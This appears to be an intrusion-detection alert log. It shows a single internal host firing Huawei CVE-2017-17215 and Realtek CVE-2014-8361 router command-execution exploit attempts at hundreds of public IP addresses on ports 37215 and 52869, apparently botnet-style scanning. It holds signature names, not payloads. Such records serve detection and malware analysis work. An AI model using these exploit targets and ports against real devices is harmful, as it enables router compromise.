                                      07/20/24-23:01:34.062277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405437215192.168.2.23160.103.123.17
                                      07/20/24-23:01:43.450134TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615051252869192.168.2.23223.103.54.206
                                      07/20/24-23:01:57.762774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5825052869192.168.2.2360.220.21.170
                                      07/20/24-23:01:42.979245TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613416652869192.168.2.2327.36.59.232
                                      07/20/24-23:01:04.118165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738437215192.168.2.23157.86.217.223
                                      07/20/24-23:01:43.994464TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4392452869192.168.2.232.84.107.116
                                      07/20/24-23:01:42.702732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24967452869192.168.2.2380.70.75.159
                                      07/20/24-23:02:13.086086TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23868452869192.168.2.2348.17.76.254
                                      07/20/24-23:01:02.328384TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5159652869192.168.2.23195.184.165.232
                                      07/20/24-23:01:11.635828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257437215192.168.2.23157.185.20.188
                                      07/20/24-23:01:31.322217TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24059052869192.168.2.23117.200.16.247
                                      07/20/24-23:01:41.337240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615720852869192.168.2.23160.40.68.243
                                      07/20/24-23:01:42.571884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4780052869192.168.2.23190.100.221.147
                                      07/20/24-23:01:44.698984TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5924252869192.168.2.2313.31.40.78
                                      07/20/24-23:01:53.697003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613462452869192.168.2.23192.45.244.106
                                      07/20/24-23:02:12.267183TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24203652869192.168.2.2387.152.13.65
                                      07/20/24-23:01:42.207149TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613822852869192.168.2.2351.209.215.233
                                      07/20/24-23:01:43.158919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298452869192.168.2.23105.83.227.139
                                      07/20/24-23:01:02.070492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688637215192.168.2.23157.180.36.121
                                      07/20/24-23:01:45.074222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4811452869192.168.2.23112.102.125.164
                                      07/20/24-23:01:21.923917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631837215192.168.2.23197.212.226.255
                                      07/20/24-23:01:43.659105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4389252869192.168.2.23128.128.73.171
                                      07/20/24-23:01:02.220064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4721252869192.168.2.2354.68.100.131
                                      07/20/24-23:01:08.599361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601452869192.168.2.23213.241.106.75
                                      07/20/24-23:01:26.037548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615234452869192.168.2.2345.38.7.5
                                      07/20/24-23:03:04.216653TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4981852869192.168.2.23137.33.102.155
                                      07/20/24-23:01:52.390301TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615104252869192.168.2.23144.14.202.149
                                      07/20/24-23:01:53.697942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936652869192.168.2.2334.85.175.26
                                      07/20/24-23:01:40.285038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820637215192.168.2.23158.207.166.74
                                      07/20/24-23:01:42.883774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5086652869192.168.2.23139.92.32.15
                                      07/20/24-23:01:02.047411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159637215192.168.2.23157.221.87.32
                                      07/20/24-23:01:44.203130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3846852869192.168.2.23173.68.146.233
                                      07/20/24-23:01:45.063335TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614096252869192.168.2.23208.111.2.186
                                      07/20/24-23:01:41.370646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5272652869192.168.2.2363.75.166.170
                                      07/20/24-23:01:46.783122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3872852869192.168.2.23157.175.172.46
                                      07/20/24-23:01:52.569791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614012852869192.168.2.23209.10.74.49
                                      07/20/24-23:02:12.085791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3788652869192.168.2.23117.32.81.72
                                      07/20/24-23:01:03.258634TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3700052869192.168.2.2377.76.243.3
                                      07/20/24-23:01:48.171604TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709852869192.168.2.23170.211.30.37
                                      07/20/24-23:01:55.903210TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4922052869192.168.2.23185.10.206.42
                                      07/20/24-23:01:42.966322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5125252869192.168.2.2385.144.205.165
                                      07/20/24-23:01:53.021606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4920652869192.168.2.2337.140.130.170
                                      07/20/24-23:01:08.585790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3344652869192.168.2.23115.35.215.139
                                      07/20/24-23:01:31.981855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668237215192.168.2.23197.97.226.41
                                      07/20/24-23:01:44.718858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5809252869192.168.2.2339.124.235.174
                                      07/20/24-23:01:42.175191TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23460252869192.168.2.2392.1.18.107
                                      07/20/24-23:01:46.109943TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5506252869192.168.2.2391.202.203.164
                                      07/20/24-23:01:43.224525TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25168052869192.168.2.23174.138.8.92
                                      07/20/24-23:01:45.202570TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24356052869192.168.2.23193.12.149.189
                                      07/20/24-23:01:59.377547TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5276452869192.168.2.2367.74.143.214
                                      07/20/24-23:01:08.574948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912052869192.168.2.23153.0.45.254
                                      07/20/24-23:01:58.067320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3507452869192.168.2.23108.147.254.33
                                      07/20/24-23:01:48.275988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5498852869192.168.2.23200.200.4.87
                                      07/20/24-23:01:53.503242TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24332652869192.168.2.2377.15.73.106
                                      07/20/24-23:01:58.067320TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615201252869192.168.2.23161.244.156.106
                                      07/20/24-23:01:02.070492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908437215192.168.2.2341.218.249.85
                                      07/20/24-23:01:44.971718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5447852869192.168.2.23136.252.196.177
                                      07/20/24-23:01:48.221889TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5948452869192.168.2.23221.223.71.222
                                      07/20/24-23:01:42.514942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613293652869192.168.2.2339.114.224.236
                                      07/20/24-23:01:41.956473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24289652869192.168.2.23182.86.228.100
                                      07/20/24-23:01:53.372532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3382852869192.168.2.23196.46.94.209
                                      07/20/24-23:01:44.398920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23429252869192.168.2.23168.75.18.77
                                      07/20/24-23:01:20.152427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403437215192.168.2.23197.250.222.179
                                      07/20/24-23:01:43.642551TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24456852869192.168.2.2354.184.6.19
                                      07/20/24-23:01:44.440143TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615422852869192.168.2.23158.140.216.184
                                      07/20/24-23:01:11.818830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616437215192.168.2.23197.47.55.117
                                      07/20/24-23:01:41.330687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5275052869192.168.2.2394.66.88.32
                                      07/20/24-23:01:44.446628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5916052869192.168.2.2391.15.191.58
                                      07/20/24-23:01:54.979156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3711852869192.168.2.23122.69.178.214
                                      07/20/24-23:01:57.330552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4125652869192.168.2.23206.154.64.238
                                      07/20/24-23:01:14.100332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087837215192.168.2.2374.49.109.135
                                      07/20/24-23:01:40.290003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681237215192.168.2.2341.190.219.204
                                      07/20/24-23:01:04.642910TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615694052869192.168.2.23170.225.184.185
                                      07/20/24-23:01:45.513282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614554852869192.168.2.23122.90.179.148
                                      07/20/24-23:01:43.994464TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613485052869192.168.2.23120.69.243.217
                                      07/20/24-23:01:41.431519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6039052869192.168.2.23147.68.197.111
                                      07/20/24-23:01:44.729296TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25123652869192.168.2.23173.58.223.243
                                      07/20/24-23:01:02.054387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049037215192.168.2.2394.167.167.154
                                      07/20/24-23:01:02.070492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730437215192.168.2.23111.12.203.144
                                      07/20/24-23:01:42.213822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3944252869192.168.2.23150.125.163.90
                                      07/20/24-23:01:42.670071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3513252869192.168.2.23106.204.29.126
                                      07/20/24-23:02:02.954311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25566652869192.168.2.23203.184.58.202
                                      07/20/24-23:01:14.103467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282437215192.168.2.2341.191.214.143
                                      07/20/24-23:01:53.429797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614772052869192.168.2.23121.198.173.54
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4514437215192.168.2.2341.77.106.70
                                      07/20/24-23:01:48.221889TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4178252869192.168.2.23110.158.170.123
                                      07/20/24-23:01:02.309528TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6072652869192.168.2.2338.47.147.236
                                      07/20/24-23:01:11.817771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851637215192.168.2.23130.210.124.219
                                      07/20/24-23:01:40.331150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800437215192.168.2.2341.39.175.234
                                      07/20/24-23:01:49.231608TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24225252869192.168.2.23124.13.0.132
                                      07/20/24-23:01:01.628180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615379852869192.168.2.2394.221.100.187
                                      07/20/24-23:01:02.127340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661637215192.168.2.2341.243.119.9
                                      07/20/24-23:01:31.313163TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23990652869192.168.2.2367.128.52.113
                                      07/20/24-23:01:34.077334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857237215192.168.2.23197.233.42.243
                                      07/20/24-23:01:42.434719TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614500852869192.168.2.2350.3.243.177
                                      07/20/24-23:01:27.649731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950837215192.168.2.23157.39.79.111
                                      07/20/24-23:01:40.334933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3338837215192.168.2.23157.204.247.250
                                      07/20/24-23:01:47.995636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5291452869192.168.2.2319.242.116.26
                                      07/20/24-23:01:49.055673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3480052869192.168.2.2368.106.199.227
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233037215192.168.2.2341.250.13.148
                                      07/20/24-23:01:51.161030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614595052869192.168.2.23218.205.210.219
                                      07/20/24-23:01:46.439689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5551652869192.168.2.2399.181.48.189
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688637215192.168.2.23197.57.234.7
                                      07/20/24-23:01:43.239928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3679652869192.168.2.23185.111.137.113
                                      07/20/24-23:01:48.918065TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23797052869192.168.2.23138.132.84.64
                                      07/20/24-23:01:08.621030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24312252869192.168.2.2387.1.160.57
                                      07/20/24-23:01:58.055687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356652869192.168.2.23104.20.213.42
                                      07/20/24-23:01:21.923917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469837215192.168.2.23157.151.71.150
                                      07/20/24-23:01:41.279072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002052869192.168.2.23186.5.70.201
                                      07/20/24-23:01:57.243014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6056052869192.168.2.2368.37.23.19
                                      07/20/24-23:02:26.420170TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613626052869192.168.2.2353.255.54.255
                                      07/20/24-23:01:45.933452TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25103252869192.168.2.2379.95.218.159
                                      07/20/24-23:01:48.016319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4208452869192.168.2.2377.15.73.106
                                      07/20/24-23:00:57.221220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706837215192.168.2.23197.30.15.103
                                      07/20/24-23:01:20.152427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181037215192.168.2.23170.150.191.157
                                      07/20/24-23:01:27.729822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716037215192.168.2.23157.67.226.84
                                      07/20/24-23:01:14.111381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317237215192.168.2.2341.25.113.161
                                      07/20/24-23:01:42.664220TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25923452869192.168.2.2348.9.123.124
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755037215192.168.2.2380.165.144.55
                                      07/20/24-23:01:42.056014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662252869192.168.2.23179.77.1.115
                                      07/20/24-23:00:59.185033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282437215192.168.2.23139.165.159.227
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988637215192.168.2.23157.178.189.119
                                      07/20/24-23:01:31.329969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25215052869192.168.2.2360.163.17.129
                                      07/20/24-23:01:58.202290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4484852869192.168.2.23166.80.198.171
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283637215192.168.2.23197.208.250.204
                                      07/20/24-23:01:48.007334TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23944252869192.168.2.2317.76.42.20
                                      07/20/24-23:01:40.334934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153437215192.168.2.23197.177.151.139
                                      07/20/24-23:01:41.909668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23713852869192.168.2.2358.43.60.192
                                      07/20/24-23:01:46.112515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794452869192.168.2.23152.179.89.83
                                      07/20/24-23:01:43.515688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5312052869192.168.2.23162.205.235.41
                                      07/20/24-23:01:44.469869TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23563652869192.168.2.23155.71.120.47
                                      07/20/24-23:01:04.082385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3770237215192.168.2.23178.197.69.23
                                      07/20/24-23:01:00.645051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091037215192.168.2.23197.118.146.83
                                      07/20/24-23:01:47.674845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3712252869192.168.2.23138.132.84.64
                                      07/20/24-23:01:32.060731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952237215192.168.2.23131.252.149.74
                                      07/20/24-23:01:55.964600TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23462652869192.168.2.2352.24.218.23
                                      07/20/24-23:01:40.349275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414037215192.168.2.23157.88.24.192
                                      07/20/24-23:01:03.936204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615072452869192.168.2.23184.77.18.239
                                      07/20/24-23:01:41.987411TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23304852869192.168.2.23156.69.102.152
                                      07/20/24-23:01:04.039128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354637215192.168.2.23178.223.125.30
                                      07/20/24-23:02:48.447183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4971852869192.168.2.23204.115.21.200
                                      07/20/24-23:01:03.882590TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615058252869192.168.2.23212.172.247.72
                                      07/20/24-23:01:42.262354TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5593852869192.168.2.23111.229.109.170
                                      07/20/24-23:01:11.168553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4924652869192.168.2.23123.52.107.77
                                      07/20/24-23:01:42.692028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24583852869192.168.2.2377.249.102.196
                                      07/20/24-23:01:45.109957TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614694052869192.168.2.2389.230.177.62
                                      07/20/24-23:01:27.664887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826037215192.168.2.23197.148.184.251
                                      07/20/24-23:00:59.172943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966237215192.168.2.23216.40.91.1
                                      07/20/24-23:01:34.053061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320237215192.168.2.23197.213.218.177
                                      07/20/24-23:01:42.790680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5302852869192.168.2.23189.193.210.39
                                      07/20/24-23:01:21.931985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582037215192.168.2.23197.188.71.219
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338437215192.168.2.2341.220.117.2
                                      07/20/24-23:01:44.036421TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614315652869192.168.2.2354.182.169.174
                                      07/20/24-23:01:45.094539TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23858852869192.168.2.2312.154.226.190
                                      07/20/24-23:01:43.180913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613362052869192.168.2.23125.185.15.217
                                      07/20/24-23:00:57.221790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680837215192.168.2.23197.138.137.217
                                      07/20/24-23:01:52.001138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4136452869192.168.2.239.230.247.23
                                      07/20/24-23:00:57.223887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592837215192.168.2.2341.25.193.130
                                      07/20/24-23:01:11.636599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763637215192.168.2.23197.48.126.38
                                      07/20/24-23:01:40.294677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260237215192.168.2.2341.48.176.220
                                      07/20/24-23:01:51.047414TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24317252869192.168.2.23203.128.56.168
                                      07/20/24-23:02:08.781934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4532652869192.168.2.2370.23.48.212
                                      07/20/24-23:01:31.975513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4020637215192.168.2.23197.92.153.21
                                      07/20/24-23:01:34.071062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505637215192.168.2.23164.27.106.147
                                      07/20/24-23:01:57.949070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5740052869192.168.2.2379.25.231.52
                                      07/20/24-23:01:04.996043TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615207652869192.168.2.23141.31.223.242
                                      07/20/24-23:01:41.370228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4586852869192.168.2.23111.186.32.47
                                      07/20/24-23:00:57.221365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288837215192.168.2.2341.210.186.227
                                      07/20/24-23:01:44.124551TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615698852869192.168.2.23112.138.84.14
                                      07/20/24-23:01:41.322613TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613821852869192.168.2.2397.65.172.105
                                      07/20/24-23:02:08.084136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615729852869192.168.2.23180.20.148.220
                                      07/20/24-23:01:53.560520TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24364852869192.168.2.2346.82.140.27
                                      07/20/24-23:01:58.035425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615914452869192.168.2.23206.22.220.245
                                      07/20/24-23:01:08.639622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23592452869192.168.2.23196.0.98.90
                                      07/20/24-23:02:08.291319TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24448852869192.168.2.2344.124.10.6
                                      07/20/24-23:01:02.486908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3732852869192.168.2.2325.108.103.192
                                      07/20/24-23:01:27.666100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207637215192.168.2.23197.156.176.6
                                      07/20/24-23:01:44.663524TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25623252869192.168.2.23201.86.102.204
